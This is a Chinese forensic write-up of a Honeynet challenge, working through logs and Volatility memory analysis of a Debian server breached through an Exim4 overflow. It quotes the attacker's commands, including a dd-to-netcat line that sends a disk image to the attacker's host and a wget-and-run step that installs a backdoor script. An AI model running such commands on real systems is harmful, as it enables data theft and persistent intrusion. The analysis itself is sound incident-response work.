0x01 题目及样本来自honeynet

本次镜像来自开源组织honeynet的一次竞赛项目，目的是解答8个问题，在接下来的分析中会提及。

0x02

提供了三个文件

都解压开来

图中这三个img格式的镜像文件就是我们需要分析的重点

首先安装volatility，待会儿会用到

查看帮助信息

说明可以使用了

1.什么服务以及那个账户触发了警报

将镜像挂载到mnt

查看日志

将结果往下拉，可以看到大量的无效登录

可以分析出ssh服务被暴力攻击，攻击者攻击的账户名是ulysses

2.在目标服务器上运行着哪种操作系统？（包括OS,CPU等信息）

输入下图命令

可以看出是debian发行版5.0
然后去查看dmesg

结果如下

可以看到具体的版本信息，系统内核版本2.6.26

内存信息

缓存信息等

在使用volatility进行分析前，必须指定相应的file，由前面得出的linux发行版的信息，用网上公开分享的proifle，本次需要使用debian5.0的
将下载得到的profile放在指定目录volatility/plugins/overlays/linux
下

运行volatility，看看是否正确加载我们添加的profile

第一行就是添加的
现在回来，第二个问题还没结束,可以使用进一步查看CPU的相关信息

3目标服务器上哪些进程正在运行

查看导出的文件

4.攻击者的ip和目标主机的ip

分析这个问题可以从日志入手
回到前面挂载的镜像

查看maillog

再查看rejectlog

mail log和reject日志显示攻击者在192.168.56.1和192.168.56.101处发送的邮件。
再查看authlog

auth.log还显示攻击者在192.168.56.1上多次尝试ssh登录。

另外在使用volatility分析连接时，我们输入下图的命令

可以看到目标主机ip 192.168.56.102和攻击主机 192.168.56.1在4444和8888端口建立了连接

5.什么服务被攻击了

从前面exim4的mainlog日志就可以看到攻击者发送的电子邮件数据太大并且似乎包含一些恶意命令，如调用服务器192.168.56.1来下载文件c.pl和rk.tar等
可见，被攻击的服务是exim4

6.对于目标服务器发动的是什么攻击

通过搜索引擎查询可以判断出是关于Exim4的缓冲区溢出攻击，CVE-2010-4344
详情可参考
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4344

7.攻击者有哪些收获？

按照/root/.bash_history中观察到的历史记录

很明显攻击者通过下面提到的命令发送了驱动器sda1的整个副本
dd if=/dev/sda1 | nc 192.168.56.1 4444

8.攻击者下载了哪些文件，并分析

还是由上面的分析可以知道攻击者已经下载了两个文件c.pl和rk.tar，两个文件都在/ tmp中找到。

对c.pl的简单分析表明，它是一个perl脚本，用于创建一个c程序，该程序编译后提供一个支持SUID的可执行文件并打开一个后门并向攻击者传输信息。

攻击者下载c.pl并且编译的SUID在端口4444中打开到192.168.56.1的连接，
wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444
换种方式，使用volatility也可以得出这一结论

rk.tar是一个压缩形式的dropbear rootkit。 解压缩文件夹包含以下内容

进入解压后的文件夹

看一下shell脚本

是典型的用于监听端口和正在被设置的家目录的变量文件
再看看install.sh

install.sh创建vars.sh中指定的rkhome目录。 它将自己添加到要启动的所有init文件中，并在端口44965中作为后门shell启动dropbear。

iptables -I OUTPUT 1 -p tcp --dport 45295 -j DROP，显示攻击者试图打开防火墙接受入站连接，但iptables的语法显示他已经删除了所有出站连接。 它应该是入站并接受45295的连接。

9.请列出网络连接及相应的状态（listen、established、close）

Established :

Listen

Close